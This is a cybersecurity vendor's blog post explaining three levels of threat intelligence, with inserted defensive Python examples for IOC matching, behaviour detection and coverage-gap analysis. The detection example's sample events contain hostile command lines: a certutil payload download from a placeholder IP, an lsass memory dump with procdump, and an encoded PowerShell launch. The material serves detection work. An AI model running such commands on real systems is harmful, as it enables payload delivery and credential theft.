
The Three Levels of Cyber Threat Intelligence (And Why You Need All of Them)

April 13, 2025
Cyber Threat Intelligence covers more than initially thought — read about its different levels, and how using all can maximise its benefits.

by Kade Morton (CEO)
Introduction

Strategic, Operational, and Tactical.

When people talk about cyber threat intelligence (CTI), what they usually mean is Indicators of Compromise (IOCs).

IP addresses, malware hashes, domains, YARA or Sigma rules. That’s the tactical level. It’s valuable, but it’s also just one part of the picture.

In reality, threat intelligence operates across three levels: strategic, operational, and tactical. And if you’re only using one, you’re not getting the full benefit CTI can provide.

This post will break down each level, give examples of how it’s used, and help you figure out if your organisation is using CTI to its full potential.

Tactical CTI: The Front Line

Tactical CTI is where most CTI programs begin, and often where they stop.

What it is:

Tactical CTI provides observable indicators. Think:

  • Malicious IPs
  • File hashes
  • Suspicious domains
  • Signatures for malware or exploits

Who it’s for:

SOC analysts, detection engineers, threat hunters.

Use cases:

  • Blocking known threats at the firewall or endpoint
  • Speeding up triage during alert investigations
  • Writing detection rules for SIEM or EDR
  • Automating defences through IOC feeds
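The use cases above reduce to one mechanical step: take an indicator set and match it against what your telemetry saw. The block below is an added example (not Arachne Digital's code) of that step in Python. The IOC feed and the log lines are constructed for illustration using documentation address ranges and a reserved example domain, so none of the values are real indicators; the log format (`key=value` pairs after a timestamp and source tag) is an assumption for the example.

```python
"""Tactical CTI in practice: match a small IOC set against log lines.

Added example, not Arachne Digital's code. The IOC feed and log lines are
constructed; IPs are from documentation ranges (RFC 5737), the domain is a
reserved example name (RFC 2606), and the hash is an arbitrary SHA-256.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed IOC feed, grouped by indicator type.
IOC_FEED = {
    "ip": {"203.0.113.45"},
    "cidr": {"198.51.100.0/24"},
    "domain": {"update-check.example.net"},
    "sha256": {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"},
}

# Constructed log lines (proxy, DNS and EDR sources) in an assumed key=value format.
SAMPLE_LOGS = [
    "2025-04-13T10:01:02Z proxy src=10.0.0.12 dst=203.0.113.45 host=cdn.example.com",
    "2025-04-13T10:01:05Z dns src=10.0.0.12 host=a.update-check.example.net",
    "2025-04-13T10:02:11Z edr src=10.0.0.14 sha256=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08",
    "2025-04-13T10:03:00Z proxy src=10.0.0.9 dst=198.51.100.77 host=mail.example.com",
    "2025-04-13T10:04:00Z proxy src=10.0.0.9 dst=192.0.2.10 host=example.org",
]


@dataclass(frozen=True)
class Hit:
    line_no: int
    ioc_type: str
    value: str


def _parse_kv(line: str) -> dict:
    """Pull key=value pairs out of one constructed log line."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def _domain_matches(host: str, bad: str) -> bool:
    """Exact match or any subdomain of the listed domain (trailing dot tolerated)."""
    host = host.lower().rstrip(".")
    return host == bad or host.endswith("." + bad)


def match_iocs(lines, feed=IOC_FEED):
    """Return a Hit for every indicator that appears in the log lines.

    Matching is normalised so the feed still fires on a mixed-case hash,
    a subdomain of a listed domain, or an address inside a listed CIDR.
    """
    nets = [ipaddress.ip_network(c) for c in feed["cidr"]]
    hits = []
    for n, line in enumerate(lines, 1):
        kv = _parse_kv(line)
        for key in ("src", "dst"):
            if key not in kv:
                continue
            ip = kv[key]
            if ip in feed["ip"]:
                hits.append(Hit(n, "ip", ip))
                continue
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:
                continue
            for net in nets:
                if addr in net:
                    hits.append(Hit(n, "cidr", str(net)))
        if "host" in kv:
            for bad in feed["domain"]:
                if _domain_matches(kv["host"], bad):
                    hits.append(Hit(n, "domain", bad))
        if "sha256" in kv and kv["sha256"].lower() in feed["sha256"]:
            hits.append(Hit(n, "sha256", kv["sha256"].lower()))
    return hits


if __name__ == "__main__":
    for h in match_iocs(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.ioc_type} matched {h.value}")
```

Each hit says only that a known-bad value was touched; it says nothing about what the attacker did with it, which is exactly the limit of the tactical level. Indicators also decay: an address or domain in a feed is often abandoned by the time you block it, so a hit list like this needs an expiry policy.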

Where Arachne Digital fits:

We built Thread to enrich raw text (news articles, threat reports, breach disclosures) with MITRE ATT&CK TTPs. Instead of just telling you "this IP is bad," Thread helps you understand how it was used (initial access, lateral movement, exfiltration) and lets you map that activity directly onto your environment.

Operational CTI: Connecting the Dots

Operational CTI tells you how attackers work. This is the bridge between raw indicators and strategic decision-making.

What it is:

Operational CTI focuses on campaign patterns and attacker behaviours, such as:

  • Common tactics and techniques
  • Toolsets used in recent intrusions
  • Shifts in targeting or tradecraft
  • Infrastructure reuse across campaigns

Who it’s for:

Detection engineers, incident response teams, purple teams, CTI analysts.

Use cases:

  • Improving detection through understanding TTPs
  • Informing red team simulations
  • Building better playbooks
  • Prioritising patching and hardening efforts
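"Improving detection through understanding TTPs" means writing rules that key on what the attacker does rather than on the artefacts they happen to use. The block below is an added example (not Arachne Digital's code) of a handful of behaviour rules, each tagged with the ATT&CK technique it detects, run over constructed process-creation events with Sysmon-style fields (`image`, `original_filename`, `parent_image`, `cmdline`); the events, paths and command lines are made up for the example, and the field names are an assumption.

```python
"""Operational CTI in practice: behaviour detections keyed to ATT&CK techniques.

Added example, not Arachne Digital's code. The events are constructed
process-creation records with Sysmon-style field names; no rule references
a hash, IP or domain, so each keeps firing when the attacker rotates
infrastructure, recompiles a tool or renames a binary.
"""
import re
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Rule:
    technique: str                  # MITRE ATT&CK technique ID
    name: str
    match: Callable[[dict], bool]


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _base(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _orig(e: dict) -> str:
    # OriginalFileName comes from the PE version resource, so a renamed copy
    # still reports its real name; prefer it over the on-disk file name.
    return e.get("original_filename", "").lower()


RULES = [
    Rule("T1204.002", "Office application spawning a shell",
         lambda e: _base(e["parent_image"]) in OFFICE and _base(e["image"]) in SHELLS),
    # PowerShell accepts abbreviated switches, so -e, -ec, -en and -enc all mean -EncodedCommand.
    Rule("T1059.001", "PowerShell launched with an encoded command",
         lambda e: _orig(e) == "powershell.exe"
         and re.search(r"(?i)\s-(e|ec|en|enc|encodedcommand)\s", " " + e["cmdline"]) is not None),
    Rule("T1105", "certutil used to fetch a remote file",
         lambda e: _orig(e) == "certutil.exe"
         and re.search(r"(?i)-urlcache|-verifyctl", e["cmdline"]) is not None),
    Rule("T1003.001", "LSASS process memory dumped",
         lambda e: "lsass" in e["cmdline"].lower()
         and (_orig(e).startswith("procdump") or "minidump" in e["cmdline"].lower())),
]

# Constructed events: one benign PowerShell run, then four attacker behaviours.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "original_filename": "Cmd.Exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'cmd.exe /c "%TEMP%\invoice_stage.cmd"'},
    {"image": r"C:\Users\Public\svc.exe",            # renamed copy of powershell.exe
     "original_filename": "PowerShell.EXE",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "svc.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "original_filename": "CertUtil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.exe"},
    {"image": r"C:\Users\Public\pd.exe",             # renamed procdump
     "original_filename": "procdump",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "pd.exe -accepteula -ma lsass.exe C:\\Users\\Public\\l.dmp"},
]


def evaluate(event: dict) -> list:
    """Technique IDs whose rule fires on one process-creation event."""
    return [r.technique for r in RULES if r.match(event)]


def technique_counts(events) -> dict:
    """How often each technique was observed across a batch of events."""
    counts = {}
    for e in events:
        for t in evaluate(e):
            counts[t] = counts.get(t, 0) + 1
    return counts


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{_base(e['image']):16} -> {evaluate(e) or 'no detection'}")
    print(technique_counts(SAMPLE_EVENTS))
```

The renamed PowerShell and procdump copies are the point: an image-name or hash rule misses both, while a rule built on the behaviour (an encoded command, a dump of lsass) and on the binary's original file name still fires. The technique counts are what feed back into the operational picture, which tactics you are actually seeing, and into the gap analysis that strategic planning needs.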

Where Arachne Digital fits:

Thread helps here too, but so does Spindle. Spindle tracks known threat actors and their aliases, linking them to ATT&CK TTPs, historical campaigns, and public reporting. Combined, these tools let analysts move from “what happened” to “how and why it happened.”

Strategic CTI: The Bigger Picture

Strategic CTI zooms all the way out. It’s about adversaries, motivations, and risk. This is the type of intelligence that belongs in a boardroom briefing.

What it is:

Strategic CTI answers questions like:

  • Who’s targeting our sector, and why?
  • Are we at risk due to geopolitical events?
  • What threats should we plan for over the next year?

Who it’s for:

CISOs, risk managers, executive leadership, and policymakers.

Use cases:

  • Informing security strategy and budgeting
  • Supporting business continuity and resilience planning
  • Justifying investments in specific capabilities
  • Understanding long-term adversary intent

Where Arachne Digital fits:

This is where Spindle and Tracery come in. Spindle organises threat actor attribution across campaigns and countries, while Tracery, our privacy-focused metasearch engine, helps us find the raw reports needed to track global threats in real time. Together, they provide both the source material and the structure for strategic decision-making.

Why You Need All Three

Most organisations think they’re “doing CTI” when they subscribe to an IOC feed. But tactical intelligence on its own is reactive. It only tells you what the attacker did yesterday.

Without operational CTI, you don’t know how attackers adapt.
Without strategic CTI, you don’t know which threats matter most to your business.

If you want to build a threat-informed defence, the approach popularised by MITRE's Center for Threat-Informed Defense, you need to align your defences against the threats most likely to affect you. That means understanding the full threat landscape across all three levels.

What Is Threat-Informed Defence?

Threat-informed defence is the practice of aligning your security decisions and controls with real-world threats, based on how adversaries actually operate.

Rather than guessing what might happen or relying solely on compliance checklists, threat-informed defence starts with threat intelligence. It uses data about actual attacks, campaigns, tools, and tactics used in the wild, to shape detection rules, response plans, and long-term strategy.

It’s about moving from reactive to proactive. From generic protection to tailored defence.

Why It’s Useful

  • Better resource allocation: You can focus on threats that are relevant to your organisation or sector, rather than trying to defend against everything.
  • Improved detection: Understanding TTPs lets you build detections that catch attacker behaviour, not just known indicators.
  • Faster response: Playbooks and simulations can be based on real adversary workflows, reducing the time it takes to contain and recover.
  • Stronger justification: Strategic CTI helps security teams communicate risks and justify investment to executives and boards.

How CTI Guides the Process

Threat-informed defence is only possible with good CTI. Here’s how the three levels of intelligence feed into the process:

  • Tactical CTI provides indicators to detect and block known threats.
  • Operational CTI reveals how attackers behave, helping teams build effective detections and playbooks.
  • Strategic CTI shapes long-term priorities by showing which threats are most likely to target your business.

When CTI is structured and mapped, such as through frameworks like MITRE ATT&CK, it becomes even more powerful. You can see gaps in your defences, align your security controls with actual threats, and track improvement over time.
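Once actor reporting and your own detections are both expressed as ATT&CK technique IDs, "seeing gaps" and "tracking improvement" become set arithmetic. The block below is an added example (not Arachne Digital's code) that does that arithmetic: it keeps only the actors reported against your sector, weights each technique by how heavily those actors are reported, lists the uncovered techniques most significant first, and scores coverage so two quarters can be compared. The actor names, their sector targeting, their technique lists and report counts are constructed for the example and describe no real threat group; the technique IDs are real ATT&CK identifiers.

```python
"""Threat-informed defence in practice: from mapped CTI to a prioritised gap list.

Added example, not Arachne Digital's code. ACTOR-A/B/C, their targeting,
technique lists and report counts are constructed and do not describe real
groups. Technique IDs are MITRE ATT&CK identifiers.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Actor:
    name: str
    sectors: frozenset      # sectors the (constructed) reporting says it targets
    techniques: frozenset   # ATT&CK technique IDs seen in its campaigns
    reports: int            # reports describing it in the last year


ACTORS = [
    Actor("ACTOR-A", frozenset({"finance", "energy"}),
          frozenset({"T1566.001", "T1204.002", "T1059.001", "T1105", "T1003.001", "T1021.001"}), 6),
    Actor("ACTOR-B", frozenset({"finance"}),
          frozenset({"T1190", "T1078", "T1059.001", "T1053.005", "T1486"}), 4),
    Actor("ACTOR-C", frozenset({"healthcare"}),
          frozenset({"T1566.001", "T1047", "T1071.001"}), 3),
]

# Techniques with a validated detection at the end of each quarter (constructed).
COVERAGE_Q1 = frozenset({"T1566.001", "T1059.001", "T1105"})
COVERAGE_Q2 = COVERAGE_Q1 | {"T1003.001", "T1021.001"}


def relevant_actors(actors, sector):
    """Strategic filter: only actors reported against our sector count."""
    return [a for a in actors if sector in a.sectors]


def technique_weights(actors, sector) -> Counter:
    """Weight each technique by the reporting volume of the relevant actors
    using it, so a technique shared by several active actors outranks one
    seen in a single campaign."""
    weights = Counter()
    for a in relevant_actors(actors, sector):
        for t in a.techniques:
            weights[t] += a.reports
    return weights


def prioritised_gaps(actors, sector, covered):
    """Relevant techniques with no validated detection, most significant first.
    Each entry is (technique, weight, sorted names of the actors using it)."""
    weights = technique_weights(actors, sector)
    users = {}
    for a in relevant_actors(actors, sector):
        for t in a.techniques:
            users.setdefault(t, []).append(a.name)
    gaps = [(t, w, sorted(users[t])) for t, w in weights.items() if t not in covered]
    return sorted(gaps, key=lambda g: (-g[1], g[0]))


def coverage_score(actors, sector, covered) -> float:
    """Share of the weighted, sector-relevant technique mass that is covered.
    Compare successive quarters to track improvement over time."""
    weights = technique_weights(actors, sector)
    total = sum(weights.values())
    if total == 0:
        return 0.0
    return sum(w for t, w in weights.items() if t in covered) / total


if __name__ == "__main__":
    for t, w, who in prioritised_gaps(ACTORS, "finance", COVERAGE_Q1):
        print(f"{t:10} weight={w:2} used by {', '.join(who)}")
    print(f"Q1 coverage: {coverage_score(ACTORS, 'finance', COVERAGE_Q1):.0%}")
    print(f"Q2 coverage: {coverage_score(ACTORS, 'finance', COVERAGE_Q2):.0%}")
```

Note what the sector filter does: T1047, used only by the actor targeting healthcare, never appears in the finance gap list, and the three techniques shared by the heavily reported ACTOR-A rise to the top. That is the whole argument of the post in miniature; the tactical and operational layers supply the technique IDs, the strategic layer decides which actors count, and only together do they tell you what to build next.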

Threat-informed defence is at the heart of what Arachne Digital does. Every tool we build (Thread, Spindle, Tracery) is designed to help organisations not just consume intelligence, but apply it meaningfully.

Takeaway: Ask These Two Questions
  • Am I getting all three levels of CTI from my provider? (Tactical, Operational, Strategic)
  • Am I actually using that intelligence to shape detection, response, and strategy?

If the answer to either is no, you’re leaving value on the table.

Start thinking holistically about threat intelligence.

Benefits

Why select Arachne?

Do you want to maximise your security within your budget? Arachne Digital is the logical choice.

Our platform searches the internet for information on threat actors, gathers reports, and categorises the findings by region, industry, and threat actor. Our process automatically maps TTPs to MITRE ATT&CK®, slashing research time and saving you money.

Threat Mitigation Experts

Connect with a way to see and neutralise potential attacks before they impact your organisation. Arachne Digital empowers organisations to anticipate and avoid cyber threats by delivering actionable intelligence.

Optimised Security Posture

By integrating the precise threat intelligence provided by our reports, you can evolve, prioritise and implement effective and continually updated security controls relevant to your organisation.

Streamlined Compliance

Comprehensive, insightful threat intelligence reports support audit preparations. Demonstrate a proactive approach to cybersecurity and achieve and maintain compliance more easily.

Testimonials & Partnerships

“Arachne Digital’s team works closely with us in integrating our tool, Speculo, with their data. Speculo is designed to help organisations get a full picture of their cyber risk with reliable analytics and a streamlined risk assessment process. The integration of Arachne Digital’s threat intelligence into Speculo provides evidence-based insights into cyber risks, making the tool more relevant to our customers. Arachne facilitated multiple face-to-face meetings and video calls, provided technical resources, comprehensive documentation, and example reports. This collaboration ensured that we could seamlessly integrate and utilize their data, significantly enriching the value we deliver to our clients.

Arachne Digital’s commitment to excellence and their proactive approach in supporting our needs have made them an indispensable partner. We highly recommend their services to any organisation looking to strengthen their threat intelligence capabilities.”

Partnership

We are partnered with DISARM Foundation.

Arachne Digital is proud to partner with the DISARM Foundation as the inaugural member of their Partner Programme, launched at the beginning of 2024.

This partnership is crucial in supporting the DISARM Foundation’s mission to maintain and enhance the DISARM Framework, ensuring it remains a free and continuously updated resource in the fight against disinformation.

Through our collaboration, Arachne Digital provides valuable feedback, promotes the integration of the framework into our operations, and encourages wider adoption within the defender community. This partnership highlights our commitment to combating evolving threats and fostering a secure digital environment.


Empower. Defend. Prevail.


© 2025 Arachne Digital, ALL RIGHTS RESERVED